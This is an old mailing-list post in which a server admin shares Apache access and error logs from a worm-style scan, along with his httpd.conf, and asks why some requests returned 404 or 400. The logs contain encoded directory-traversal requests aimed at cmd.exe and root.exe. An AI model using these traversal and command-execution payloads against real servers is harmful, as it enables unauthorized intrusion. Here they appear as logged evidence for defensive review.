Bizarre apache logs
Hi
I had some bizarre 404 entries in my apache logs. They are very rare, but it
looks as they resulted from an attempted attack. Well say it was a rather
lame attack, but I wonder where the 404 and 400 came from. As the server is
configured, there should be only 403 answers, as the whole http part is
closed. Except for one directory and from the intranet. From the outside one
can access the server via https only.
I don't know if I have to be alerted or something, but I would feel better
if someone could check my set up. Just for making sure, that it is not a
misconfiguration. The server is an older Compaq Proliant 800, some Pentium
133 MHz. Rather slow, perhaps this has an influence.
Below are the error.log and access.log in question an at the end the
relevant section of the httpd.conf.
Regards
Marcel
############################################################################
###
access.log: I put some newlines between the 404 an the rest of it.
80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir
HTT
P/1.0" 403 286 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /MSADC/root.exe?/c+dir
HTTP/
1.0" 403 284 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET
/c/winnt/system32/cmd.exe?/c
+dir HTTP/1.0" 403 294 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET
/d/winnt/system32/cmd.exe?/c
+dir HTTP/1.0" 403 294 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
/scripts/..%255c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
/_vti_bin/..%255c../..%255c.
./..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
/_mem_bin/..%255c../..%255c.
./..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
/msadc/..%255c../..%255c../.
.%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
403 341 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
/scripts/..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
/scripts/..%c0%2f../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
/scripts/..%c0%af../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
/scripts/..%c1%9c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
/scripts/..%%35%63../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
/scripts/..%%35c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
/scripts/..%25%35%63../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
/scripts/..%252f../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
###########################################################################
In the error.log there are following entries:
[Sun Sep 29 12:50:03 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/scripts
[Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/MSADC
[Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/c
[Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/d
[Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/scripts
[Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/_vti_bin
[Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/_mem_bin
[Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/msadc
[Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/scripts
[Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/scripts
[Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/scripts
[Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/scripts
[Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by
serve
r configuration: /var/www/scripts
####################################################################3
Here comes my httpd.conf
<Location />
Order allow,deny
deny from all
</Location>
<VirtualHost _default_:80>
ServerName xxx.foo.com
ServerAlias xxx.faa.com
<Location />
Order allow,deny
allow from 192.x.x.0/24 # allow access only from the intranet
AuthType Basic
AuthName "foo"
AuthLDAPBindDN "xxxxxxxxxxxxxxxxxxxxxxxx"
AuthLDAPBindPassword "xxxxxxxxxxxxxxxxxxx"
AuthLDAPUrl ldap://dddddddddddddddddddddddddddddddddddddd
require valid-user
</Location>
<Location /public>
Order allow,deny
allow from all
satisfy any
</Location>
<Location /zykadmin>
Order allow,deny
allow from 192.x.x.0/24
</Location>
<Location /servlets>
Order allow,deny
Allow from 192.x.x.0/24
</Location>
#### Servlets welche via http zugänglich sind
WebAppDeploy examples warpConnection /servlets/examples/
WebAppDeploy lagerchargen warpConnection /servlets/agauga/
</VirtualHost>
<VirtualHost _default_:443>
DocumentRoot /var/www
ServerName xxx.foo.com
ServerAlias yyy.faa.com
#### Servlets welche via https zugänglich sind
WebAppDeploy examples warpConnection /servlets/examples/
WebAppDeploy lagerchargen warpConnection /servlets/agauga/
<Location />
Order allow,deny
allow from all
AuthType Basic
AuthName "iiiiiiiiiiiii"
AuthLDAPBindDN "ooooooooooooooooooo"
AuthLDAPBindPassword "xxxxxxxxxx"
AuthLDAPUrl ldap://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
require valid-user
</Location>
<IfModule mod_ssl.c>
SSLEngine on
SSLCertificateFile /etc/apache/ssl.crt/server.crt
SSLCertificateKeyFile /etc/apache/ssl.key/server.key
# SetEnvIf User-Agent ".*MSIE.*" nokeepalive
ssl-unclean-shutdown
</IfModule>
</VirtualHost>
--------------------
PGP / GPG Key: http://www.ncpro.com/GPG/mmweber-at-ncpro-com.asc
Reply to: